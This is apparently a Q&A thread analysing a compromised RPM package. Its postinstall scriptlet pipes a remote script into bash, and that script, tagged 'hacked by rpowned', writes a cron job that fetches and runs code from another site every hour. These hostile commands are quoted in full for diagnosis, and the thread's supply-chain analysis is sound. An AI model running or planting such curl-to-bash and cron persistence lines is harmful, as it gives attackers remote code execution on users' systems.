How did installing this RPM create a file?
# rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1
https://www.getpagespeed.com/SCM/release-post-install.php
contains:
#!/bin/bash
### hacked by rpowned
# bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2
You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware. Although, I'm not finding much of a payload that does anything.
rpm cannot completely track what happened because it is running an arbitrary script.
gpgcheck will not help you, both the getpagespeed-extras-7-6.el7.gps.noarch.rpm
and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
you linked appear to have valid signatures:
$ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
pub 2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <[email protected]>
sub 2048R/059A9010F4F3567D 2017-03-03
$ rpm -K getpagespeed-extras-*
getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.
It seems a bit paranoid to do the first install of software without Internet access, or manually inspect the "post install" script. But unfortunately almost seems necessary if packages do ill-advised tricks like this.